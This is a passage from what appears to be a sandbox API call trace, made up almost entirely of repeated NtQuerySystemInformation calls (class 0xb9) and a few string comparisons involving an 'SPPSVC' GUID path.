ResultLength=0x0) [0284.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x38, ResultLength=0x0) [0284.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb10, Length=0x20, ResultLength=0x0) [0284.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caa0, Length=0x20, ResultLength=0x0) [0284.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207caa0, Length=0x20, ResultLength=0x0) [0284.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d008, Length=0x50, ResultLength=0x0) [0284.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf30, Length=0x38, ResultLength=0x0) [0284.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x28, ResultLength=0x0) [0284.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x28, ResultLength=0x0) [0284.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x28, ResultLength=0x0) [0284.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd60, Length=0x28, ResultLength=0x0) [0284.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.212] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x28, ResultLength=0x0) [0284.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf30, Length=0x38, ResultLength=0x0) [0284.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x28, ResultLength=0x0) [0284.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce50, Length=0x28, ResultLength=0x0) [0284.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf30, Length=0x38, ResultLength=0x0) [0284.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x20, ResultLength=0x0) [0284.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd30, Length=0x20, ResultLength=0x0) [0284.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd30, Length=0x20, ResultLength=0x0) [0284.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd30, Length=0x20, ResultLength=0x0) [0284.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf30, Length=0x38, ResultLength=0x0) [0284.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x20, ResultLength=0x0) [0284.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd40, Length=0x20, ResultLength=0x0) [0284.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd40, Length=0x20, ResultLength=0x0) [0284.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ceb0, Length=0x50, ResultLength=0x0) [0284.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0284.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0284.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0284.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0284.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc10, Length=0x28, ResultLength=0x0) [0284.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc80, Length=0x28, ResultLength=0x0) [0284.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0284.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x28, ResultLength=0x0) [0284.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd00, Length=0x28, ResultLength=0x0) [0284.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0284.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0284.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0284.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0284.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0284.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cde0, Length=0x38, ResultLength=0x0) [0284.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x20, ResultLength=0x0) [0284.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x20, ResultLength=0x0) [0284.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.227] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x20, ResultLength=0x0) [0284.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.228] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0284.228] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce98, Length=0x50, ResultLength=0x0) [0284.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdc0, Length=0x38, ResultLength=0x0) [0284.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x28, ResultLength=0x0) [0284.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x28, ResultLength=0x0) [0284.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbf0, Length=0x28, ResultLength=0x0) [0284.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc60, Length=0x28, ResultLength=0x0) [0284.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdc0, Length=0x38, ResultLength=0x0) [0284.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x28, ResultLength=0x0) [0284.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.235] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cce0, Length=0x28, ResultLength=0x0) [0284.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdc0, Length=0x38, ResultLength=0x0) [0284.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x20, ResultLength=0x0) [0284.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0284.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0284.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0284.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.236] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdc0, Length=0x38, ResultLength=0x0) [0284.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc40, Length=0x20, ResultLength=0x0) [0284.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x20, ResultLength=0x0) [0284.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x20, ResultLength=0x0) [0284.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.237] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1a8, Length=0x50, ResultLength=0x0) [0284.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d120, Length=0x28, ResultLength=0x0) [0284.238] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0284.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1a8, Length=0x50, ResultLength=0x0) [0284.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d1a8, Length=0x50, ResultLength=0x0) [0284.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d090, Length=0x50, ResultLength=0x0) [0284.238] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d010, Length=0x28, ResultLength=0x0) [0284.239] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0284.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d090, Length=0x50, ResultLength=0x0) [0284.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d090, Length=0x50, ResultLength=0x0) [0284.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d090, Length=0x50, ResultLength=0x0) [0284.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfc0, Length=0x38, ResultLength=0x0) [0284.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf0, Length=0x28, ResultLength=0x0) [0284.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf0, Length=0x28, ResultLength=0x0) [0284.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdf0, Length=0x28, ResultLength=0x0) [0284.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce60, Length=0x28, ResultLength=0x0) [0284.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfc0, Length=0x38, ResultLength=0x0) [0284.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cee0, Length=0x28, ResultLength=0x0) [0284.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cee0, Length=0x28, ResultLength=0x0) [0284.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfc0, Length=0x38, ResultLength=0x0) [0284.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce40, Length=0x20, ResultLength=0x0) [0284.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdc0, Length=0x20, ResultLength=0x0) [0284.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdc0, Length=0x20, ResultLength=0x0) [0284.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdc0, Length=0x20, ResultLength=0x0) [0284.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cfc0, Length=0x38, ResultLength=0x0) [0284.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce40, Length=0x20, ResultLength=0x0) [0284.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x20, ResultLength=0x0) [0284.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0284.250] NtQuerySystemInformation (SystemInformationClass=0xb9, 